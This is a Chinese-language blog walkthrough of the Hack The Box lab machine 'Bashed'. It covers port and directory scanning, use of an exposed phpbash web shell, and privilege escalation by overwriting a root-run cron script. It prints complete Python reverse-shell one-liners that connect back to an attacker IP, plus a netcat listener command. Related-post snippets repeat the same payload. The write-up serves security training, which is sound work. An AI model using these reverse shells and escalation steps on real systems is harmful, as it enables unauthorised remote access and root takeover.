HTB-hackthebox-Bashed

最新推荐文章于 2023-02-06 15:31:24 发布
最新推荐文章于 2023-02-06 15:31:24 发布
阅读量524 收藏
点赞数
分类专栏: htb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/114259850
版权

靶机描述

清单

  • 信息搜集

    • nmap
    • dirsearch
    • 未受到保护的危险php文件

  • 提权

    • sudo -l
    • 定时脚本

信息搜集

靶机IP

image-20210228185455631

端口扫描

nmap 10.10.10.68

Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http

80

页面内容如下

image-20210228185650026

介绍了 phpbash https://github.com/Arrexel/phpbash

功能是在 Web 页面里可以像交互式shell 一样进行

我们只需要找到这个位置在哪就能获取简单的shell 了

目录扫描

python3 dirsearch.py -u http://10.10.10.68/ -e php

[17:49:40] 200 -    0B  - /config.php
[17:49:43] 301 -  308B  - /css  ->  http://10.10.10.68/css/
[17:49:46] 301 -  308B  - /dev  ->  http://10.10.10.68/dev/
[17:49:46] 200 -    1KB - /dev/
[17:49:52] 301 -  310B  - /fonts  ->  http://10.10.10.68/fonts/
[17:49:57] 301 -  311B  - /images  ->  http://10.10.10.68/images/
[17:49:58] 200 -    8KB - /index.html
[17:50:01] 301 -  307B  - /js  ->  http://10.10.10.68/js/
[17:50:15] 200 -  939B  - /php/
[17:50:26] 403 -  299B  - /server-status
[17:50:26] 403 -  300B  - /server-status/
[17:50:39] 301 -  312B  - /uploads  ->  http://10.10.10.68/uploads/
[17:50:39] 200 -   14B  - /uploads/

在 /dev 里得到 phpbash 的位置

image-20210228190043485

使用

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.26",2233));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

来获取 shell

www-data

得到 www-data 会话
image-20210228190137914

看起来我们可以不需要密码移动到 scriptmanager 用户

scriptmanager

image-20210228190307197

切换至 script 用户

来到根目录下的 scripts 目录

test.py 内容为

scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close

目录结构如下

image-20210228190438448

看起来test.py 回以root 权限运行

获取ROOT

1、将 test.py 内容写入

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.26",223));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

2、监听端口

nc -lvp 223

3、等待2分钟

得到 root

image-20210228190626160
http://blog.yutian233.xyz/

赛博雨天
关注
专栏目录
[渗透测试学习] Devvortex - HackTheBox
rev1ve的博客
12-08 836
我们用kali自带的工具去扫描出Joomla版本信息。然后修改error.php,添加反弹shell命令。发现80端口有http服务,并且是nginx服务。我们访问发现是企业站点,扫描一下是否存在子域名。,我们登录web界面访问robots.txt。由于ssh连接不上,我们采取反弹shell。刚开始ls还没找到,加个参数-al才发现有。然后记住该脚本序号,使用-m参数复制下来。发现有个脚本,我们谷歌尝试搜一下。尝试访问web界面,发现跳转到。但是我们发现目前用户的权限不够。查看一下得到密码,数据库名。
HackTheBox-Bashed渗透测试
weixin_43111940的博客
04-13 321
端口信息,只开了80端口 目录扫描 gobuster dir -u http://10.10.10.68 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x 'html,php,asp,aspx,zip,rar' /dev/目录下有php的shell文件 通过执行命令可以判断是Linux系统,因为对命令的大小写敏感 既然可以执行命令,尝试一下用反弹shell命令,尝试了php,Linux的反弹命令,但是没有拿到she
HackTheBox::Bashed
aya3t的博客
10-11 461
HackTheBox::Bashed
Bashed -- hack the box
neal1991的专栏
04-04 522
IntroductionTarget: 10.10.10.68 (OS: Linux)Kali linux: 10.10.16.44Information Enumera...
HTB-Bashed
TA不懒,但还没有添加简介
07-16 494
HTB-Bashed
Hack the box靶机 bashed
菜浪马废的博客
05-07 370
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subp...
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
03-21
在这个"Stego-Challenges-HackTheBox-Write-Ups"压缩包中,很可能包含了作者解决HTB平台上一系列Stego挑战的详细过程,包括他们使用的Python代码、解密策略以及最终的解决方案。通过阅读这些Write-ups,你可以学习到...
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
vagrant-htbHackTheBox的Vagrantfile
03-01
流浪汉 Kali流浪者设置(最低) 安装工具 vim 网络工具 python3 解压缩 多路复用器 纳帕 网页壳 ...如果要添加更多,只需编辑Provision / kali.yml文件。...再一次,g,如果您想添加更多,只需将git repo...cd vagrant-htb
HTB-Gen:脚本para gerar邀请de HackTheBox
03-29
脚本para gerar邀请de HackTheBox Windows / Linux Qualquer pessoa pode usar o script para fins lucrativos,para usar apenas tens abrir o teu Terminal / CMD dentro do diretorio do script depois ...
hackthebox-bashed (考点:phpbash,linux修改脚本)
冬萍子癸水
04-11 628
nmap 就一个80. 打开看看都很直白提示了是phpbash 拿dirbuster扫一扫 看到phpbash,点进去。进入网页版bash 把这个shell弹到我本机来 命令有很多,但我试了几个没反应 最后这个OK python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);...
hack the box靶场练习之bashed
qq_44767905的博客
02-06 278
hack the box靶场练习之bashed
HTB靶场系列 Linux靶机 Bashed靶机
m0_57221101的博客
01-10 1290
勘探 惯例先用nmap扫描一下端口,发现开了80端口 ┌──(root????Mr)-[~/dirsearch] └─# nmap 10.10.10.68 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 14:30 CST Nmap scan report for 10.10.10.68 Host is up (1.2s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/
hack the box[HTB]web题之Fuzzy
qq_39682037的博客
05-11 1922
gohb@gohb:~/桌面$ gobuster dir -u http://docker.hackthebox.eu:30568/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt gohb@gohb:~$ gobuster dir -u http://docker.hackthebox.eu:30568/ap...
Haystack - hack the box
neal1991的专栏
11-30 587
Introduction Target: 10.10.10.115(Linux) Kali: 10.10.16.61 HayStack is an easy box in hack the box. But it does isn't easy at all. It's annoying to find the user and password in the messy Spanis...
HTB(hack the box) Cartographer
weixin_44215027的博客
12-12 492
HTB(hack the box) Cartographer 这道是30points的web题。 提示: 一些地下黑客正在开发一种新的命令和控制服务器。你能闯进去看看他们在干什么吗? 进入网页: 是一个登录界面,首先尝试弱口令:admin admin。 没有提示,又回到了这个页面。 然后,没有验证码,想到爆破,但是因为没有登录错误信息,而且要爆破两个位置,这不太现实。 然后,又尝试用万能密码来...
黑客入门,从HTB开始
热门推荐
neal1991的专栏
10-20 4万+
Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场。 之前在 HTB 也玩过一些机器。里面的机器难度有好几个档次,insane 难度的一般都是极其困难的,这种机器一般让我对着大神的 Writeup 我可能都没有办法复现出来。之前也有在公众号上分享过几篇 H...
如何连接Hack The Box的靶机?
Gh0st_1n_The_Shell的博客
09-06 1971
首先先注册账号,然后打开页面,在labs哪里选择一个靶机 选择加入 加入后会返回一个IP地址,这个IP地址就是你的ip 然后退出来,点击右上角 三个随便点一个 第一个使用vpn连接到官方的靶机上,然后此靶机是多人公用的 第二个应该是可以把靶机搭载在自己的服务器上,如果有的话 我以第一个举例 选择好端口后就可以点击download vpn,如果想要改服务器的话则需要先将靶机赞同然后再改 把下载下来的文件保存,如果是用虚拟机攻击靶机的话则拷贝到虚拟机内,我是用kali,所以以kali举例 为了方便,
No.122-HackTheBox-Linux-Bashed-Walkthrough渗透学习
qq_34801745的博客
06-04 353
** HackTheBox-Linux-Ariekei-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/118 靶机难度:初级(4.5/10) 靶机发布日期:2017年12月20日 靶机描述: Bashed is a fairly easy machine which focuses mainly on fuzzing and locating important files. As basic access to th
hackthebox
最新发布
09-11
Hack The Box (HTB) 是一个在线的渗透测试和网络安全训练平台。它提供了一系列虚拟机,供用户尝试攻击和入侵。用户可以通过解决一系列的密码学、网络、应用程序等挑战来增强他们的渗透测试技能。HTB 的目标是帮助...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值